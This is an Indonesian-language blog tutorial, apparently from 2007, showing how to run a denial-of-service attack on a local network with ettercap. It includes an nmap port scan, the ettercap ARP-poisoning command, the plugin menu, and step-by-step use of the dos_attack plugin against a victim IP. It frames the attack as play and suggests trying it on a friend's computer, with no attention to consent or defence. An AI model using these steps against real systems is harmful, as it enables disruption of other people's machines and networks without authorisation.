Masih ingatkah serangan DOS-attack ( Denial of Service attack ) yang sering digunakan hacker ? Serangan ini menggunakan port-port yang tidak terlindungi pada suatu server lalu mem-bombardir tanpa ampun! Hasilnya adalah server / komputer yang diserang perlahan akan lelet dan akhirnya hang.Pada Debian Etch 4.0, tools ini sudah ada tetapi harus diinstal terlebih dahulu dari repositori-nya, tinggal di eksekusi melalui konsole dengan command ettercap. Lalu bagaimana kinerja DOS attack, cara menggunakan ettercap dan efek serangan DOS?
DOS attack menggunakan ARP sebagai medianya. Kinerja dari DOS attack ini adalah menganalisis port-port yang tidak terproteksi lalu mengirim data-data dalam jumlah banyak pada port tersebut agar server menjadi hang atau crash. Keuntungan bila server crash? tentu ini tidak perlu saya jelaskan bukan? Bila serangan ini difokuskan pada port 80, maka website yang dihosting pada server tersebut akan mati. Kenapa mati? karena Apache ( bila server menggunakan webserver ini ) akan kelebihan beban dan hasilnya overload. Pada kasus berikut, spesifikasi mini server saya adalah AthlonXP 2600+, Ram 512MB, OS Debian etch 4.0 dan menggunakan kabel LAN cross sebagai komunikasi. Pada mini server ini, service yang saya hidupkan sebagai berikut :
blackexe:/# nmap -sS yodi.web.ugm.ac.id
Starting Nmap 4.11 (
http://www.insecure.org/nmap/ ) at 2007-06-29 11:16 UTC
Interesting ports on Leonzack.yodi.web.ugm.ac.id (192.168.0.1):
Not shown: 1669 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
113/tcp open auth
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
901/tcp open samba-swat
3306/tcp open mysql
Nmap finished: 1 IP address (1 host up) scanned in 0.127 seconds
Pada server mini tidak terpasang firewall sama sekali ( semacam dog guard,etc ). Pada percobaan pertama, mas agus menguji coba dengan command :
################################################################################
linuxer46:~# ettercap -T -M arp // //
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on eth0... (Ethernet)
eth0 -> 00:00:50:00:46:2C 192.168.0.1 255.255.255.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
|=======================> | 45.10 %
################################################################################
Setelah proses scanning 100% dan muncul data-data sniffing, tekan p untuk masuk ke opsi selanjutnya.dan muncul :
################################################################################
Available plugins :
[0] arp_cop 1.1 Report suspicious ARP activity
[0] autoadd 1.2 Automatically add new victims in the target range
[0] chk_poison 1.1 Check if the poisoning had success
[0] dns_spoof 1.1 Sends spoofed dns replies
[0] dos_attack 1.0 Run a d.o.s. attack against an IP address
[0] dummy 3.0 A plugin template (for developers)
[0] find_conn 1.0 Search connections on a switched LAN
[0] find_ettercap 2.0 Try to find ettercap activity
[0] find_ip 1.0 Search an unused IP address in the subnet
[0] finger 1.6 Fingerprint a remote host
[0] finger_submit 1.0 Submit a fingerprint to ettercap's website
[0] gre_relay 1.0 Tunnel broker for redirected GRE tunnels
[0] gw_discover 1.0 Try to find the LAN gateway
[0] isolate 1.0 Isolate an host from the lan
[0] link_type 1.0 Check the link type (hub/s)
[0] pptp_chapms1 1.0 PPTP: Forces chapms-v1 from chapms-v2
[0] pptp_clear 1.0 PPTP: Tries to force cleartext tunnel
[0] pptp_pap 1.0 PPTP: Forces PAP authentication
[0] pptp_reneg 1.0 PPTP: Forces tunnel re-negotiation
[0] rand_flood 1.0 Flood the LAN with random MAC addresses
[0] remote_browser 1.2 Sends visited URLs to the browser
[0] reply_arp 1.0 Simple arp responder
[0] repoison_arp 1.0 Repoison after broadcast ARP
[0] scan_poisoner 1.0 Actively search other poisoners
[0] search_promisc 1.2 Search promisc NICs in the LAN
[0] smb_clear 1.0 Tries to force SMB cleartext auth
[0] smb_down 1.0 Tries to force SMB to not use NTLM2 key auth
[0] stp_mangler 1.0 Become root of a switches spanning tree
Packet visualization stopped...
Plugin name (0 to quit): dos_attack
################################################################################
Setelah itu anda tinggal memasukkan ip address korban beserta ip lain agar ip anda tidak dapat dilihat.( tapi tetap saja bisa dilihat ).
###########################################
Activating dos_attack plugin...
Insert victim IP: 192.168.0.4
Insert unused IP: 192.168.0.3
###########################################
Bila muncul berbagai command-command poisoning ARP yang bertebaran tinggal tunggu saja komputer korban akankah teler atau tidak. Dapat anda ujicoba pada komputer teman anda sebagai percobaan. Selamat bermain-main DOS attack di Linux!